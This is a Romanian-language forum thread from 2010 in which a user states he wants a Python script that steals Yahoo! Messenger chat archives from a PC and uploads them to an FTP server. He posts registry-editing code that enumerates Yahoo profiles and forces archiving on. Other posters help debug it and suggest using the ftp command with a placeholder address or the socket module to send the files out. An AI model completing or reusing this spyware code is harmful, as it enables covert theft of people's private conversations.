AlStar Posted January 3, 2010 Report Posted January 3, 2010 Salut!Vreau sa fac un script in Python care sa fure arhivele Yahoo! din PC si sa le uploadeze pe un server FTP.Am cateva probleme cu scrierea scriptului si am nevoie de putin ajutor.1. trebuie sa modific 2 valori din registru, insa nu am voie...import _winregm_key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER,r"Software\Yahoo\Profiles")profil = range(0,100)for a in profil: try: profil[a] = _winreg.EnumKey(m_key,a) except WindowsError: breakprofil = profil[:a]_winreg.CloseKey(m_key)for a in profil: sub_cheie = "Software\Yahoo\pager\profiles\\"+a+"\Archive" m_key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER,sub_cheie) _winreg.SetValueEx(m_key,'Enabled',0,_winreg.REG_DWORD,1)- ultima linie returneaza WindowsError 5: Acces Denied.Ce pot face?Merci. Quote
CyberWolf08 Posted January 3, 2010 Report Posted January 3, 2010 Esti pe vista sau win7? Atunci UAC e cel ce nu te lasa sa modifici registru Quote
AlStar Posted January 3, 2010 Author Report Posted January 3, 2010 XP SP3. Nu exista nicio metoda prin care, transformand scriptul in .exe sa faca modificari in registru? Quote
Flubber Posted January 3, 2010 Report Posted January 3, 2010 ok, s-ar putea sa zic o prostie, dar arhivele nu se afla in folder-ul Yahoo!\Messenger\Profiles\x\Archive ? nu stiu ce vrei tu sa faci cu registriile (cu siguranta nu cred ca ai cum sa le furi din registrii) iar cat despre FTP cred ca va trebuii sa importezi modulul socket, cum am mai zis, nu sunt sigur, sunt incepator in py dar ce ai scris tu acolo e foarte ciudat (ma refer la motiv) nu inteleg ce vrei sa faci cu registriile// le: @ FTP: sau mai simplu sa il faci sa execute in cmd, folosind ftp xxx.xxx.xxx.xxx , dar cred ca stiai deja asta, sunt idei... Quote
CyberWolf08 Posted January 3, 2010 Report Posted January 3, 2010 Deschide registrii pentru a seta mess-ul sa salveze mereu arhivele Quote
Flubber Posted January 3, 2010 Report Posted January 3, 2010 Deschide registrii pentru a seta mess-ul sa salveze mereu arhiveleam observat acum ca are un "ArchiveSettings<nr>"am incercat si eu SI:IDLE 2.6.4 ==== No Subprocess ====>>> Traceback (most recent call last): File "C:\Documents and Settings\x\Desktop\qwd.py", line 11, in <module> m_key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER,sub_cheie)WindowsError: [Error 2] The system cannot find the file specified>>> LE:nu cumva ai gresit ceva aici: sub_cheie = "Software\Yahoo\pager\profiles\\"+a+"\Archive"?din cate inteleg ai pus profiles\ si apoi iar \ ca sa sara peste " sa nu-l interpreteze ca inceputul unui string dar apoi nu trebuia sa pui iar dupa plus \ ?adica din: sub_cheie = "Software\Yahoo\pager\profiles\\"+a+"\Archive"in sub_cheie = "Software\Yahoo\pager\profiles\\"+a+\"\Archive"LE(2): neh, am gresit, nu e bine cum am zis, mda revin mai tarziu cu mai multe teste, trebuie sa ies cu cainele Quote
AlStar Posted January 3, 2010 Author Report Posted January 3, 2010 Deschide registrii pentru a seta mess-ul sa salveze mereu arhiveleExact.Flubber, ai postat degeaba. Am verificat de vreo 5 ori sub_cheia. Eroarea apare cand incerc sa modific registrele. Eu vreau o solutie pentru a trece de aceasta eroare. By default, Yahoo! Messenger sterge arhivele cand iesi..daca ar ramane stocate n-ar mai fi nevoie de modificarea registrelor.. Quote
Flubber Posted January 3, 2010 Report Posted January 3, 2010 Exact.Flubber, ai postat degeaba. Am verificat de vreo 5 ori sub_cheia. Eroarea apare cand incerc sa modific registrele. Eu vreau o solutie pentru a trece de aceasta eroare. By default, Yahoo! Messenger sterge arhivele cand iesi..daca ar ramane stocate n-ar mai fi nevoie de modificarea registrelor..Am inteles, eu ma intrebam de ce tie iti merge, iar mie nu Quote
AlStar Posted January 3, 2010 Author Report Posted January 3, 2010 Ruleaza codul in WingIDE. IDLE nu se descurca cu new-line-urile.. Quote
Flubber Posted January 3, 2010 Report Posted January 3, 2010 la fel, zice clar si raspicat: THE SYSTEM CANNOT FIND THE FILE SPECIFIEDe o problema cu variabila sub_cheieWindowsError: [Error 2] The system cannot find the file specifiedFile "C:\Documents and Settings\x\Desktop\qwd.py", line 11, in <module> m_key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER,sub_cheie) Quote
AlStar Posted January 3, 2010 Author Report Posted January 3, 2010 Dai un print profil ca sa vezi ce stocheaza.De altfel, intra si in regedit si verifica daca exista subcheia. (HKEY_CURRENT_USER\Software\Yahoo\pager\profiles\). Quote
Flubber Posted January 3, 2010 Report Posted January 3, 2010 Dai un print profil ca sa vezi ce stocheaza.De altfel, intra si in regedit si verifica daca exista subcheia. (HKEY_CURRENT_USER\Software\Yahoo\pager\profiles\).subcheia exista, cat despre print profil, profil fiind ce anume? Quote
AlStar Posted January 3, 2010 Author Report Posted January 3, 2010 "profil" e lista in care sunt memorate profile (ramure din \Software\Yahoo\Profiles) Quote